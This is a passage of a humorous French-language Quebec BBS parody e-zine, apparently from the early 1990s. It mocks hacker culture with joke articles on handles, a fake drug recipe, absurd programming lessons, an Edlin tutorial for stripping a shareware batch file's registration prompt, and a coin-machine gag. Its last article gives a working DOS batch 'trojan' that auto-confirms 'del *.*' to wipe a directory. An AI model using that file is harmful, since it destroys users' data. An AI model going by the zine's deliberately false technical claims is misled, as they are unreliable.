ÛÛþÛÜ ÛÛþ ÛÛþÜÛÛÛ ÛÛþÛÛÜ ÛÛþÛßÛÛ ÛÛþ ÛÛþßß Û ßÜ ßÜ Û Û ÛÜ ÜÛÛÛÛÛ ÛÛÛ ÛÛ
ÛÛþßÛÛÛÛþ ÛÛþßß ÜÜ ßÛÛ ÛÛþ| ÛÛ ÛÛþ ÛÛÛÜ Û Û Û Û Û Û ÛÛÛ
ÛÛÛ ßÛÛÛ ÛÛþ ßÛÛÛÛÛÛ ÛÛþ ÛÛ ÛÛþ ßÛÛÛÛ Û ßÜÜß ßÜÜß ßÜÜß ÛÜÜ ÛÛÛ


Je me cale, tu me cales, on me cale, vous me calez, je change de handle.

COMMENT CHANGER DE HANDLE
un autre article intelligent de votre tinami
DENTAL FLUSH

C'est quand votre r‚putation est … terre qu'il est temps de changer de
handle pour se refaire une autre vie. Maintenant, o— trouver le handle
convenant … votre personnalit‚? L… est la question.

La meilleure place, c'est dans l'univers ambiant. Les noms de l'espace,
style Capitaine Picouille, sont pass‚s date et d‚notent une jeunesse
accrue et un penchant pour Star Trek. Evitez aussi de prendre votre
handle dans un groupe de musique, parce que si jamais vous voulez
embarquer dans NpShit, va falloir que je change mon avis sur ce genre
de handle.

Ce que je suggŠre, c'est de pogner votre handle dans la circulaire
Provigros et d'ajouter un mot style-hot dedans:

Liste de mots style-hot

Killer Destroy
Blood Suffocation
Ugly Fire
Incinerator Mad
Cutter Snoopy

A pr‚sent, explorons les combinaisons possibles. Avec le mot KLEENEX
(qui est justement en sp‚cial cette semaine) on peut former le handle
"Kleenex of Suffocation". Un handle de ce style-l… d‚note une personne
s–re d'elle mettons, avec eee... beaucoup d'argent, et un gros rhube
probablement.

D'autres exemples de combinaisons fuck‚es avec leur signi-
fication en fran‡ais pour vous aider:

Ugly Sausage Saucisse D‚gueulasse
Chocolate Incinerator Incin‚rateur de Chocolat
Fire Rice Riz de Feu
Mad Oil Huile M‚chante
Blood Sauce Sauce de Sang
Oats Cutter Coupeur de Gruau
Killer Apple Pomme Tueuse (Orange M‚canique Part II)
Microwave Snoopy Snoopy Micro-Ondable

Vous voyez comment c'est facile d'avoir l'air hot … mes yeux! Il se
peut que vous vous fassiez rire de vous par certains users de boards
publix, mais vous savez trŠs bien qu'il est impossible qu'un user de
board publix ait raison sur quelque sujet que ce soit.

Plus loin dans ce magazine il y aura un autre article de moi. Il est
‚vident que vous allez le lire. AprŠs tout, c'est un article de moi.


ÛÛ ÜÜ ÛÛÛÛÛÜ ÜÛþÛÛÛÜ ÛÛ |ÛÛ ÜÜþ Û ÜßßÜ ÜßßÜ Û Û Ûßß ÜÛ ÛÛÛ
ÛÛþ| ÛÛþ ÛÛ ßÛÛ ÛÛþ ßß ÛÛ ÜÜÜ ÛÛþÜÜ Û Û Û Û Û Û ßßß ÛÛÛ
ÛÛþÛÜ ÛÛþ ÛÛþÜÛÛÛ ÛÛþÛÛÜ ÛÛþÛßÛÛ ÛÛþ ÛÛþßß Û ßÜ ßÜ Û Û ÛÜ ÜÛÛÛÛÛ ÛÛÛ ÛÛ
ÛÛþßÛÛÛÛþ ÛÛþßß ÜÜ ßÛÛ ÛÛþ| ÛÛ ÛÛþ ÛÛÛÜ Û Û Û Û Û Û ÛÛÛ
ÛÛÛ ßÛÛÛ ÛÛþ ßÛÛÛÛÛÛ ÛÛþ ÛÛ ÛÛþ ßÛÛÛÛ Û ßÜÜß ßÜÜß ßÜÜß ÛÜÜ ÛÛÛ


SHiT DrUGz

ToDAY: lA PLaSTiCiNe!
par Coaxial Karpette!

Bon, coeurs sensibles abstenez-vous ou bouchez-vous les yeux, cette droye
est trŠs nocive, dangereuse et prise dans la revue U.S.Drugs.

Cette droye est faite de PLASTIC!! €a destroy donc pas … peu prŠs et mˆme
un peu plus! On peut la fumer, la sniffer, la piquer, la bouffer, et la
blaster (J'ai pris ce mot l… dans la revue, mais je catch pas pantoute
ce que ‡a veut dire.) Tk, ses ingr‚dients sont trŠs faciles, pis je vais
vous les ‚crire tu-suite, le temps que je sorte mon dictionnaire.

1 morceau de plastique (Comme celui de votre camion Tonka par
exemple, sur lequel vous pouvez faire un pr‚lŠvement)
1 cuillerr‚e … table de cannabis (Vous trouverez ‡a dans tous
les bons Perrette!)
1 tasse de farine Robin Hood
1 seringue pleine d'eau comme celle que vous vous servez dans
votre bain, mais avec une aiguille
2 couteaux (Je me demande ben pourquoi)
1 poˆle au propane (Probablement pour la faire cuire!)
1 sac de guimauves (C'est mon initiative: y est pas ‚crit dans
la revue, mais c'est bon au boutte!)
1 paquet de branches (pour les guimauves)

Bon... Astheure que vous avez trouv‚ tous ces ingr‚dients sans vous faire
arrˆter ou interner, commen‡ons le m‚lange. Faire cuire le morceau de
plastique au four … 350 degr‚s farenheit jusqu'… ‚bullition. Saupoudrer
de cannabis et de farine. Tamiser. Pour 3 … 5 personnes.

PS: Si vous faites un bad trip, faites une plainte … Air-Drug. (Ceux qui
font la pub "Vous allez voler comme vous n'avez jamais vol‚, et on va vous
voler comme vous vous aurez jamais fait voler."
)


ÛÛ ÜÜ ÛÛÛÛÛÜ ÜÛþÛÛÛÜ ÛÛ |ÛÛ ÜÜþ Û ÜßßÜ ÜßßÜ Û Û Ûßß ÜÛ ÛÛÛ
ÛÛþ| ÛÛþ ÛÛ ßÛÛ ÛÛþ ßß ÛÛ ÜÜÜ ÛÛþÜÜ Û Û Û Û Û Û ßßß ÛÛÛ
ÛÛþÛÜ ÛÛþ ÛÛþÜÛÛÛ ÛÛþÛÛÜ ÛÛþÛßÛÛ ÛÛþ ÛÛþßß Û ßÜ ßÜ Û Û ÛÜ ÜÛÛÛÛÛ ÛÛÛ ÛÛ
ÛÛþßÛÛÛÛþ ÛÛþßß ÜÜ ßÛÛ ÛÛþ| ÛÛ ÛÛþ ÛÛÛÜ Û Û Û Û Û Û ÛÛÛ
ÛÛÛ ßÛÛÛ ÛÛþ ßÛÛÛÛÛÛ ÛÛþ ÛÛ ÛÛþ ßÛÛÛÛ Û ßÜÜß ßÜÜß ßÜÜß ÛÜÜ ÛÛÛ


Le Mot du m‚dium
par le m‚dium (je vois pas qui … part ‡a!)

Les rencontres du 1er type, c'est de voir une soucoupe volante. Le 2eme
type, c'est quand elle atterrit. Le 3eme type c'est quand des
extra-terrestres en sortent. Mais saviez-vous qu'une rencontre du 4eme
type survient quand un extra-terrestre devient collaborateur pour
NPShit?


ÛÛ ÜÜ ÛÛÛÛÛÜ ÜÛþÛÛÛÜ ÛÛ |ÛÛ ÜÜþ Û ÜßßÜ ÜßßÜ Û Û Ûßß ÜÛ ÛÛÛ
ÛÛþ| ÛÛþ ÛÛ ßÛÛ ÛÛþ ßß ÛÛ ÜÜÜ ÛÛþÜÜ Û Û Û Û Û Û ßßß ÛÛÛ
ÛÛþÛÜ ÛÛþ ÛÛþÜÛÛÛ ÛÛþÛÛÜ ÛÛþÛßÛÛ ÛÛþ ÛÛþßß Û ßÜ ßÜ Û Û ÛÜ ÜÛÛÛÛÛ ÛÛÛ ÛÛ
ÛÛþßÛÛÛÛþ ÛÛþßß ÜÜ ßÛÛ ÛÛþ| ÛÛ ÛÛþ ÛÛÛÜ Û Û Û Û Û Û ÛÛÛ
ÛÛÛ ßÛÛÛ ÛÛþ ßÛÛÛÛÛÛ ÛÛþ ÛÛ ÛÛþ ßÛÛÛÛ Û ßÜÜß ßÜÜß ßÜÜß ÛÜÜ ÛÛÛ


LA CHRONIQUE MENSUELLE SUR LA PROGRAMMATION
By Peanut Butter


Comme vous le savez s–rement (on s'en vante tellement!), nous, les
OFFICIERS de la MACHINE NPShit, sommes les meilleurs en absolument tout,
surtout en programmation. Nous avons d‚cid‚, nous les DIEUX de
l'INFORMATIQUE, de vous faire profiter de notre immense r‚serve de
connaissances en programmation en vous montrant quelques algorithmes
demandant un effort c‚r‚bral particuliŠrement intense pour ˆtre bien
assimil‚s.

P.S. Si vous lisez cette rubrique, envoyez-nous 30$ parce que les listings
sont copyright.

P.S. Si vous ne comprenez pas les listings, envoyez-nous 30$, nous vous
enverrons la T-phile anglaise originale.

P.S. Si vous comprenez les listings envoyez-nous 30$ et appelez-nous
pour nous les expliquer.

P.S. Dans tout autre cas, envoyez-nous 30$ pareil.


LECON #1:

Assignation d'une valeur … une variable en BASIC.

Listing 1:

10 A=7

A premiŠre vue, cela semble trŠs complexe..... Mais ne vous en faites pas,
les officiers de NPShit avec leur cerveau sup‚rieur ont compris ce listing
(aprŠs de nombreuses heures de dur labeur).

10 signifie le num‚ro de la ligne, A est la variable, 7 est la valeur.
Le plus compliqu‚ r‚side dans l'usage du '=', plusieurs personnes font
l'erreur d'‚crire 10=A 7 (cela m'arrive trŠs souvent), une erreur
aussi fr‚quente est d'‚crire 10=A=7 (cela m'arrive encore plus souvent).

Bref, l'assignation d'une variable en BASIC est trŠs compliqu‚e pour des
d‚butants comme vous (c'est pas comme nous) donc, si vous avez des
assignations … faire, envoyez-nous vos variables, vos valeur et nous vous
renverrons le listing moyennant une contribution de 30$.


LECON #2

Programmation en Assembleur pour programmeurs tres avanc‚s (officiers NPShit).

Listing 2:

MOV AX,0

Cette instruction a pour but de mettre la valeur de AX dans la valeur 0.
Comme le 0 est en fait ‚gal a AX, cela bloque l'IRQ externe de la
LED du PRINTSCREEN LOCK en maskant le chip secondaire de la master switch 6048
avec la valeur du dernier CLUSTER de l'EMS 2 watt interne au p‚riph‚rique
RESET multipli‚ par le QI total du staff de NPShit.

Comme vous voyez, nous maitrisons parfaitement l'Assembleur.
Si dans un programme, vous avez besoin de l'instruction MOV, envoyez 30$
… la machine NPShit, mais c'est pas sur que nous vous enverrons un listing.

LECON #3

Programmation d'un SCROLL vertical de qualit‚ professionnelle.

Nous utiliserons pour faire ce scroll un langage tres performant
(c'est pour ca que nous, la machine NPShit, utilisons seulement ce langage)

THE............. BATCH FILE LANGUAGE Version 5.00

Pour commencer le programme, vous devez taper au prompt

C:\>COPY CON SCROLL.NPS <enter>

Voici le listing:

@ECHO OFF
ECHO.
ECHO.
ECHO NOUS
ECHO.
ECHO.
ECHO SOMMES
ECHO.
ECHO.
ECHO LES
ECHO.
ECHO.
ECHO MEILLEURS
ECHO.
ECHO.
ECHO (c)Caillou Chanceux
ECHO.
<CTRL-Z>

Pour le faire runner, vous devez taper:

C:\>TYPE SCROLL.NPS

Puis, quand le texte apparait, vous faites plusieurs fois <ENTER> cela va
faire scroller le texte vers le haut (scroll interactif).

Cette m‚thode de scroll interactif a ‚t‚ entiŠrement d‚velopp‚e par les
officiers de la machine NPShit. Personne n'avait jusqu'alors pens‚ a faire un
scroll aussi.......... g‚nial. Cette m‚thode permet … l'utilisateur de faire
scroller le texte … la vitesse qu'il le veut selon sa rapidit‚ … user son
piton <ENTER>.


P.S. Avec un petit 30$, NPShit vous enverra 2 outils essentiels pour la
programmation en BATCH FILE, soit:

BCOMP.EXE pour compiler vos Batch files, ainsi que
BLINK.EXE pour linker vos batch files.



Pens‚e du Jour #1 : Envoyez 30$ aux officiers de la machine NPShit

Pens‚e du Jour #2 : Criss que le monde est FISH...........NPShit

FatFreePAL

Peanut Butter


ÛÛ ÜÜ ÛÛÛÛÛÜ ÜÛþÛÛÛÜ ÛÛ |ÛÛ ÜÜþ Û ÜßßÜ ÜßßÜ Û Û Ûßß ÜÛ ÛÛÛ
ÛÛþ| ÛÛþ ÛÛ ßÛÛ ÛÛþ ßß ÛÛ ÜÜÜ ÛÛþÜÜ Û Û Û Û Û Û ßßß ÛÛÛ
ÛÛþÛÜ ÛÛþ ÛÛþÜÛÛÛ ÛÛþÛÛÜ ÛÛþÛßÛÛ ÛÛþ ÛÛþßß Û ßÜ ßÜ Û Û ÛÜ ÜÛÛÛÛÛ ÛÛÛ ÛÛ
ÛÛþßÛÛÛÛþ ÛÛþßß ÜÜ ßÛÛ ÛÛþ| ÛÛ ÛÛþ ÛÛÛÜ Û Û Û Û Û Û ÛÛÛ
ÛÛÛ ßÛÛÛ ÛÛþ ßÛÛÛÛÛÛ ÛÛþ ÛÛ ÛÛþ ßÛÛÛÛ Û ßÜÜß ßÜÜß ßÜÜß ÛÜÜ ÛÛÛ


CHRONIQUE PROGRAMMATION AVANCEE
COMMENT FAIRE UN DEMO
par Bloody Steak

Le langage qui offre les meilleures possibilit‚s pour un Demo est sans aucun
doute le GWBASIC. Ce langage (bien que trŠs complexe) possŠde plusieurs
commandes des plus sophistiqu‚es (CIRCLE, LINE, BOX). N'est-ce pas
merveilleux?!

PS: Pour comprendre le reste de ce texte, nous vous conseillons de lire
le texte sur l'assignation d'une variable en GWBASIC.
Le reste du texte ne s'adresse qu'… des personnes maŒtrisant parfaitement
le GWBASIC.

10 PRINT "MON PREMIER DEMO (GRACE A NPSHIT)"
20 SCREEN 0 ' (0 = QUOTIENT INTELLECTUEL DE FAIRY COMP™ST)
' Si un jour vous comprenez cette valeur, expliquez nous la.

30 LINE (0, 0) - (4000, -20), 69

' Bon maintenant une vraie ligne complexe...
' le 0, 0 indique s–rement la couleur.
' le 4000 repr‚sente peut-ˆtre la m‚moire utilis‚e?!
' Quant au -20 c'est la probabilit‚ que cette ligne-l… marche
' le 69 c'est la position des lignes.

40 CIRCLE (2000, 0), 682, 5150

' Bon cette ligne-l… je comprends rien pantoute fake laissez moi le temps
' d'inventer quekchose pour que j'aille l'air hot en programmation.
' Bon le 2000 c'est le nombre de membres sur Galactwit BBS (Notre Gros HQ).
' Le 0 c'est le nombre d'usagers brillants sur Galactwit.
' Le 682-5150 c'est justement le # de Galactwit; normalement les cercles
' devraient logiquement former les chiffres du num‚ro du BBS.

50 END

' Maudite marde, encore un mot anglais, bon dans le dictionnaire y disent
' que ‡a veut dire FAIM. Ah ben oui je check l'heure pis y'est 6:00pm, m'a
' aller souper.

Cet exemple est vraiment des plus complexes, mais afin de vous aider, nous
offrons pour une dur‚e limit‚e un cours d'introduction au GWBASIC au co–t de
-> 50$ <- la minute. A ce prix-l… c'est une aubaine.

Les seules personnes autoris‚es de NPSHIT … se rendre chez vous pour vous
montrer le GWBASIC sont (Bloody Steak, Peanut Butter, BEEf BRoTH et Killer
Ceiling Annihilator)


ÛÛ ÜÜ ÛÛÛÛÛÜ ÜÛþÛÛÛÜ ÛÛ |ÛÛ ÜÜþ Û ÜßßÜ ÜßßÜ Û Û Ûßß ÜÛ ÛÛÛ
ÛÛþ| ÛÛþ ÛÛ ßÛÛ ÛÛþ ßß ÛÛ ÜÜÜ ÛÛþÜÜ Û Û Û Û Û Û ßßß ÛÛÛ
ÛÛþÛÜ ÛÛþ ÛÛþÜÛÛÛ ÛÛþÛÛÜ ÛÛþÛßÛÛ ÛÛþ ÛÛþßß Û ßÜ ßÜ Û Û ÛÜ ÜÛÛÛÛÛ ÛÛÛ ÛÛ
ÛÛþßÛÛÛÛþ ÛÛþßß ÜÜ ßÛÛ ÛÛþ| ÛÛ ÛÛþ ÛÛÛÜ Û Û Û Û Û Û ÛÛÛ
ÛÛÛ ßÛÛÛ ÛÛþ ßÛÛÛÛÛÛ ÛÛþ ÛÛ ÛÛþ ßÛÛÛÛ Û ßÜÜß ßÜÜß ßÜÜß ÛÜÜ ÛÛÛ


J'‚lite, je flash, j'allume, chu beau, chu intelligent, vous ˆtes une
gang de cons.

QU'EST-CE QU'UN ELITE?
By Dental Flush

Vous connaissez d‚sormais ma vision du mot Mailer et du nom Dahlen.
Mais la y'en a qui exagŠrent, nyah nyah chu plus ‚lite que toi, moi je
suis un vrai ‚lite, vous-autres vous ˆtes des immitations en in-tock, pis
moi je fais partie d'un club d'‚lite ou bien moi je suis tireur d'‚lite.

Mais NpShit est ici pour vous renseigner, pour justifier quelle est la
vraie signification du mot ‚lite. Les seuls qui peuvent se faire appeler
‚lite, ce sont les membres de NpShit. Nous sommes les seuls ayant les
qualit‚s n‚cessaires. Bref nous sommes les meilleurs. Et vous ˆtes des
nobodies. Le but c'est que vous devez nous respecter et nous v‚n‚rer.

Dans le prochain num‚ro de NpShit, je vous sortirai encore un texte
stupide, ayant pas rapport, et d‚pourvu de toute v‚racit‚ (comme … mon
habitude) mais qui devrait soulever les foules!


ÛÛ ÜÜ ÛÛÛÛÛÜ ÜÛþÛÛÛÜ ÛÛ |ÛÛ ÜÜþ Û ÜßßÜ ÜßßÜ Û Û Ûßß ÜÛ ÛÛÛ
ÛÛþ| ÛÛþ ÛÛ ßÛÛ ÛÛþ ßß ÛÛ ÜÜÜ ÛÛþÜÜ Û Û Û Û Û Û ßßß ÛÛÛ
ÛÛþÛÜ ÛÛþ ÛÛþÜÛÛÛ ÛÛþÛÛÜ ÛÛþÛßÛÛ ÛÛþ ÛÛþßß Û ßÜ ßÜ Û Û ÛÜ ÜÛÛÛÛÛ ÛÛÛ ÛÛ
ÛÛþßÛÛÛÛþ ÛÛþßß ÜÜ ßÛÛ ÛÛþ| ÛÛ ÛÛþ ÛÛÛÜ Û Û Û Û Û Û ÛÛÛ
ÛÛÛ ßÛÛÛ ÛÛþ ßÛÛÛÛÛÛ ÛÛþ ÛÛ ÛÛþ ßÛÛÛÛ Û ßÜÜß ßÜÜß ßÜÜß ÛÜÜ ÛÛÛ


D o S H A C k S

COMMENT HACKER UNE BATCH FILE
par BEEf BRoTH

Une batch file? Ca l'air compliqu‚ pour rien, mais nous allons
essayer de mettre un peu d'ordre dans vos id‚es. J'ai bien dit essayer
parce que dans l'fond j'ai ben d'la misŠre … traduire les textes anglais
qu'on pogne aux Etats.

Ok. Bon. Ok fait que d'abord vous devez savoir qu'une batch file
ca peut ˆtre ex‚cut‚. Pour cela, on doit d'abord obtenir le nom de la
batch file et la taper. J'espŠre que vous savez faire ‡a sinon cessez de
lire notre magazine, on est ben trop intelligent pour vous.

Une batch file, ‡a s'ex‚cute ligne par ligne, en ordre. Si vous
voulez voir le contenu d'une batch, vous avez la possibilit‚ de voir ce
qu'elle fait si vous l'ex‚cutez. Mais certains programmeurs exp‚riment‚s
en batch file comme notre dieu de la batch (Loocif Hair) mettent des
protections qui nous empˆchent de voir le contenu lorsqu'ex‚cut‚e.

Pour ‡a on doit se munir de Batch Debugger++ 3.0. Mais si vous
l'avez pas vous pouvez quand mˆme utiliser Edlin, qui joue un petit peu le
r“le de Debug. En fait Edlin est beaucoup plus puissant que Debug, c'est
pourquoi nous allons travailler avec celui-ci. Justement, pour les amateurs
d'environnement graphique, MicroSoft vient de sortir une version d'Edlin
pour Windows 3.1.

1- D'abord vous trouvez une batch que vous d‚sirez hacker.

2- Ensuite, vous devez ex‚cuter Edlin, avec comme ligne de com-
mande le nom de la batch.

Exemple:
C:\DOS>edlin telemate.bat

3- Une batch c'est un programme en langage cobol qui est comp-
ress‚ par PKLite en code C, mais comme si y'avait un inter-
pr‚teur de segment qui stackait les interruptions de la clock.
Pour ca vous devez vous assurer que vous pointez sur le bon
cylindre, parce que vous savez tous que si vous utilisez
HIMEM.SYS, il est possible que le DOS rentre en conflit avec
la carte de la souris au moment de passer … la modification
des adresses du speaker. (Un speaker c'est la puce qui sert
… changer l'errorlevel des pixels de votre clavier)

Quoi qu'il en soit, vous devez maintenant lister la m‚moire
afin de voir les commandes qui vont s'ex‚cuter.

La Syntaxe:
End of input file
*1l<Enter>

* c'est le prompt.
'1' c'est l'adresse en m‚moire, elle est compos‚e comme ceci:
(256 * le Segment) + l'Offset. Pis 'l' c'est pour lister …
partir de cette adresse.

Vous aurez comme r‚sultat:

1:*@echo off
2: echo TMBoot v15.8á par Loocif Hair
3: echo (C) Copyright 1987,1988,1989,1990,1991,1992
4: echo Tous droits r‚serv‚s
5: echo .
6: echo Veuillez enregistrer ce programme.
7: pause
8: c:
9: cd\telemate
10: tm %1 %2 %3 %4 %5 %6 %7 %8 %9
11: cd\

4- Le but du hack, c'est de modifier la source pour faire chier
l'auteur pis lui faire des menaces de sortir une version de
sa batch plus r‚cente. Mais maintenant, grƒce … NpShit vous
pourrez faire chier tout le monde.

Pour se faire, vous devez identifier les mots … effacer ou
… changer. Mettons que vous voulez ‚changer le nom de
l'auteur par le v“tre.

Donc on change la ligne de l'adresse 2. L… ‡a devient comp-
liqu‚. Vous signalez … edlin l'adresse … modifier.

*2<Enter>

* c'est le prompt. Faut tout le temps r‚p‚ter.
'2' c'est l'adresse. J'viens de le dire.

Vous verrez alors:

2:*echo TMBoot v15.8á par Loocif Hair
2:*_

'_', c'est le curseur.

5- Vous devez retaper le texte ‚crit en haut, ou tout simplement
le modifier. Vous devez cependant … tout prix r‚‚crire la
commande echo sinon il est dangereux que votre batch ne marche
pas. Cette commande est trŠs compliqu‚e, mais si nous avons la
chance de tomber sur un texte am‚ricain qui l'explique, nous
ferons un num‚ro sp‚cial pour vous montrer ca. Supposons que
j'‚cris:

2:*echo TMBoot v15.8á par Loocif Hair
2:*ecko tmboute v 17,9 fabriquer et distribuer par le beste cra
queur du quebec: BEEf BRoTH<enter>

6- Vous retournerez au prompt *.
Le but c'est d'enlever la petite pause pis la note qui dit d'en-
registrer le programme. Pour ca vous devez toute retapper le
programme. Une petite liste pour voir ou nous en sommes:

*1l<Enter> (vous vous souvenez que le 1 c'est l'adresse pis
le l c'est la commande de liste)

1: @echo off
2:*ecko tmboute v 15,9 fabriquer et distribuer par le beste cra
queur du quebec: BEEf BRoTH
3: echo (C) Copyright 1987,1988,1989,1990,1991,1992
4: echo Tous droits r‚serv‚s
5: echo .
6: echo Veuillez enregistrer ce programme.
7: pause
8: c:
9: cd\telemate
10: tm %1 %2 %3 %4 %5 %6 %7 %8 %9
11: cd\

La note est … la ligne 6. Nous retapperons le programme a partir
de la ligne o— nous pouvons retrouver 'c:'. Donc tapez 6 pour
‚diter la ligne:

*6<enter>

6:*echo Veuillez enregistrer ce programme.
6:*_

La vous d‚calez le programme:

6:*echo Veuillez enregistrer ce programme.
6:*c:

Vous r‚p‚tez cette op‚ration pour les lignes suivantes.

*7<enter>

7:*pause
7:*sd/talemaite

*8<enter>

8:*c:
8:*tm /1 $2 #4 ^7

(Coudonc c'est quoi ‡a? €a doit etre une commande pour cracker
Telemate)

Voyons. AprŠs ‡a donc quoi qui faut faire. En tout cas, tout
‡a semble fonctionner … merveille. Pour s'en assurer, listons.

1: @echo off
2:*ecko tmboute v 15,9 fabriquer et distribuer par le beste cra
queur du quebec: BEEf BRoTH
3: echo (C) Copyright 1987,1988,1989,1990,1991,1992
4: echo Tous droits r‚serv‚s
5: echo .
6: c:
7: sd/talemaite
8:*tm /1 $2 #4 ^7
9: cd\telemate
10: tm %1 %2 %3 %4 %5 %6 %7 %8 %9
11: cd\

7- Le r‚sultat que vous attendiez tous, je suppose. Vous devez
recompiler la source batch. Pour ca vous donnez le num‚ro de
la premiŠre et de la derniŠre ligne que vous d‚sirez conserver
avec la commande d. Nous n'avons plus besoin des lignes a partir
de 9. Vous proc‚dez de cette fa‡on:

*1,8d<Enter>

8- Finalement, vous devez enregistrer vos modifications avec la
commande q. Il vous demande une question que j'ai pas encore
r‚ussi … comprendre, mais j'ai su de source s–re d'un colla-
borateur mexicain que ‡a voulait dire "Etes-vous sur?" fait
que fions-nous … lui.

*q<Enter>
Abort edit (Y/N)? y

9- Vous ˆtes maintenant prˆt … tester votre oeuvre. Si jamais
les modifications que vous avez faites ne semblent pas avoir
‚t‚ enregistr‚es, je suppose que c'est normal parce que j'ai
jamais r‚ussi … tester la batch que je viens de faire. Nous
autres on est ben bons pour ‚crire des affaires qu'on sait
mˆme pas si ‡a marche.

J'espŠre tout de mˆme que j'ai r‚ussi … ‚tendre le champs de vos
connaissances.


ÛÛ ÜÜ ÛÛÛÛÛÜ ÜÛþÛÛÛÜ ÛÛ |ÛÛ ÜÜþ Û ÜßßÜ ÜßßÜ Û Û Ûßß ÜÛ ÛÛÛ
ÛÛþ| ÛÛþ ÛÛ ßÛÛ ÛÛþ ßß ÛÛ ÜÜÜ ÛÛþÜÜ Û Û Û Û Û Û ßßß ÛÛÛ
ÛÛþÛÜ ÛÛþ ÛÛþÜÛÛÛ ÛÛþÛÛÜ ÛÛþÛßÛÛ ÛÛþ ÛÛþßß Û ßÜ ßÜ Û Û ÛÜ ÜÛÛÛÛÛ ÛÛÛ ÛÛ
ÛÛþßÛÛÛÛþ ÛÛþßß ÜÜ ßÛÛ ÛÛþ| ÛÛ ÛÛþ ÛÛÛÜ Û Û Û Û Û Û ÛÛÛ
ÛÛÛ ßÛÛÛ ÛÛþ ßÛÛÛÛÛÛ ÛÛþ ÛÛ ÛÛþ ßÛÛÛÛ Û ßÜÜß ßÜÜß ßÜÜß ÛÜÜ ÛÛÛ


COMMENT FOURRER UNE MACHINE
A CENNES

Comme vous le savez, il y a un truc trŠs SIMPLE et facile pour
fourrer une machine … 0.25$.

Pour ce faire, vous devez tout d'abord prendre une "piasse" (voir
billet en papier qui sert de monnaie d'‚change). Pour commencer, vous
d‚chirez la piasse de bord en bord par le centre (Attention, cela doit ˆtre
fait en plein centre de la piasse, utilisez une rŠgle). Un coup que ceci est
fait, vous devriez avoir maintenant 2 ti-bouttes de piasse. Ensuite vous
virez un c“t‚ de bord (Peu importe lequel). Ensuite vous le recollez avec
du "scotch tape". AprŠs ‡a vous virez la piasse (maintenant recoll‚e) du c“t‚
de la reine (dans le cas d'un 2$). Vous devez utiliser un crayon Bic bleu …
pointe fine pour faire une tite moustache … la reine (style Hitler). Ensuite,
pliez la piasse en 2 dans le sens du long.

AprŠs coup, prenez un Exacto (faites attention pour ne pas vous
couper, la gang de NPShit n'est pas responsable des accidents) et d‚coupez
soigneusement le petit 2 (dans le cas d'un 2$ bien s–r) en haut … gauche
(Important, il ne faut pas d‚passer). Ensuite prenez un lighter ou un briquet
(… votre choix) et br–lez le coin oppos‚ (juste un ti-peu). Bon vous avez
enfin fini le massacre. Essayez-le maintenant. Si ca marche pas, ben je suis
d‚sol‚ de vous apprendre que cette petite exp‚rience vient de vous co–ter 2$
(toujours dans le cas d'un 2$). Si ca marche, c'est probablement que vous
n'avez pas suivi les instructions … la lettre, ou je ne comprends pas.....

Je suis d‚sol‚.....

Explosive Banana


ÛÛ ÜÜ ÛÛÛÛÛÜ ÜÛþÛÛÛÜ ÛÛ |ÛÛ ÜÜþ Û ÜßßÜ ÜßßÜ Û Û Ûßß ÜÛ ÛÛÛ
ÛÛþ| ÛÛþ ÛÛ ßÛÛ ÛÛþ ßß ÛÛ ÜÜÜ ÛÛþÜÜ Û Û Û Û Û Û ßßß ÛÛÛ
ÛÛþÛÜ ÛÛþ ÛÛþÜÛÛÛ ÛÛþÛÛÜ ÛÛþÛßÛÛ ÛÛþ ÛÛþßß Û ßÜ ßÜ Û Û ÛÜ ÜÛÛÛÛÛ ÛÛÛ ÛÛ
ÛÛþßÛÛÛÛþ ÛÛþßß ÜÜ ßÛÛ ÛÛþ| ÛÛ ÛÛþ ÛÛÛÜ Û Û Û Û Û Û ÛÛÛ
ÛÛÛ ßÛÛÛ ÛÛþ ßÛÛÛÛÛÛ ÛÛþ ÛÛ ÛÛþ ßÛÛÛÛ Û ßÜÜß ßÜÜß ßÜÜß ÛÜÜ ÛÛÛ


Bon, pause pub!

DENTAL FLUSH
la sommit‚ en matiŠre de tout
EST COMMANDIT PAR
P R O V I G R O S

Les articles de Dental Flush, les citrons de Provigros.


ÛÛ ÜÜ ÛÛÛÛÛÜ ÜÛþÛÛÛÜ ÛÛ |ÛÛ ÜÜþ Û ÜßßÜ ÜßßÜ Û Û Ûßß ÜÛ ÛÛÛ
ÛÛþ| ÛÛþ ÛÛ ßÛÛ ÛÛþ ßß ÛÛ ÜÜÜ ÛÛþÜÜ Û Û Û Û Û Û ßßß ÛÛÛ
ÛÛþÛÜ ÛÛþ ÛÛþÜÛÛÛ ÛÛþÛÛÜ ÛÛþÛßÛÛ ÛÛþ ÛÛþßß Û ßÜ ßÜ Û Û ÛÜ ÜÛÛÛÛÛ ÛÛÛ ÛÛ
ÛÛþßÛÛÛÛþ ÛÛþßß ÜÜ ßÛÛ ÛÛþ| ÛÛ ÛÛþ ÛÛÛÜ Û Û Û Û Û Û ÛÛÛ
ÛÛÛ ßÛÛÛ ÛÛþ ßÛÛÛÛÛÛ ÛÛþ ÛÛ ÛÛþ ßÛÛÛÛ Û ßÜÜß ßÜÜß ßÜÜß ÛÜÜ ÛÛÛ


-=-= BATCH FILEZ AVANCEES =-=-
Construire un trojan en batch files
par Killer Ceiling Annihilator

Tout le monde pense qu'il faut un dipl“me d'‚tudes primaires
pour ‚crire un trojan. Eh bien c'est faux: la preuve, j'en ai
‚crit un. (Je l'ai aussi essay‚, et j'ai perdu mon r‚pertoire,
alors il marche s–rement.)

PremiŠrement, utilisez la puissante commande COPY CON pour
‚diter le trojan. Pour se faire, tapez COPY CON TROJAN.BAT. Tapez
ensuite ceci:

ecro Trojan (c)1993 by K.C.A
ecro Un instant SVP, j'efface votre r‚pertoire
ecro O>TROJAN.TMP
del *.*<TROJAN.TMP>NUL

Tapez <Ctrl-Z> et <Enter> pour finir. (C'est la partie
compliqu‚e.)

Oups! Mon frŠre vient de m'avertir que je me suis tromp‚ et
qu'il faut ‚crire ECHO plut“t qu'ECRO. Retapez donc votre
programme avec COPY CON:

echo Trojan (c)1993 by K.C.A
echo Un instant SVP, j'efface votre r‚pertoire
echo O>TROJAN.TMP
del *.*<TROJAN.TMP>NUL

Bon! Maintenant chargeons le programme. Tapez PROGRAMME.
Comme vous le voyez, il ‚crit "Nom de commande ou de fichier non
valide"
ou un message en anglais. Si c'est un message en anglais,
NPShit pense … vous! Retapez le programme avec "Y" au lieu de
"O"!

ecro Trojan (c)1993 by K.C.A
ecro Un instant SVP, j'efface votre r‚pertoire
ecro Y>TROJAN.TMP
del *.*<TROJAN.TMP>NUL

Ah non, j'ai encore ‚crit ECRO!

echo Trojan (c)1993 by K.C.A
